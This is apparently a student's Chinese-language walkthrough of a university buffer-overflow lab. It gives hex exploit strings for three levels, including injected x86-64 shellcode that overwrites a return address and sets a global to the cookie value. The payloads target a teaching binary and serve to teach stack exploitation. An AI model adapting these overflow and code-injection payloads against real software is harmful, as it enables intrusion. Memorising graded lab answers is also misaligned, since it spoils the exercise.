Buffer Overflows Lab

stack 大概长这样

 

Level 0: Candle

只要覆盖掉return 就行了

比如：

c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 

 

 

 

Level 1: Sparkler

要求将 arg 变为 cookie值

c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 70 10 40 00 00 00 00 00 b6 c4 fd 29 b2 96 02 3f b6 c4 fd 29 b2 96 02 3f

 

 

Level 2: Firecracker

要求将 bang 里面的global value 设为 cookie 值。

思路是：先return到 stack 上的特定代码段，执行我们替换global value 的代码，然后在返回到bang函数

替换 global 的汇编代码为

mov 0x602320, %rsi 
mov %rsi, 0x602308
push $0x00401020
retq

 

通过 

$ gcc -c test.s
$ objdump -d test.o > test.d

 

生成二进制代码

test.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:    48 8b 34 25 20 23 60     mov    0x602320,%rsi
   7:    00 
   8:    48 89 34 25 08 23 60     mov    %rsi,0x602308
   f:    00 
  10:    68 20 10 40 00           pushq  $0x401020
  15:    c3                       retq   

 然后将这段二进制代码插入特定stack段

48 8b 34 25 20 23 60 00 48 89 34 25 08 23 60 00 68 20 10 40 00 c3 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 00 b7 ff ff ff 7f 00 00

 这样就ok了

 

 

Extra Credit – Level 3: Dynamite 下次在做

 

 

2015-09-28

转载于:https://www.cnblogs.com/whuyt/p/4843782.html